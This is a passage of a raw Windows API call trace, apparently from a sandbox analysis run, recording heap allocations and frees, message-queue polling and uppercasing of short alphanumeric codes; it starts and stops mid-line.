HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.636] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.636] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.637] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.637] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.637] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.637] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.638] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.638] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.639] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.639] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.641] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0254.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0254.641] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.642] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.642] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.643] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0254.643] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0254.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.645] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.645] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0254.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.645] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.646] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.646] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 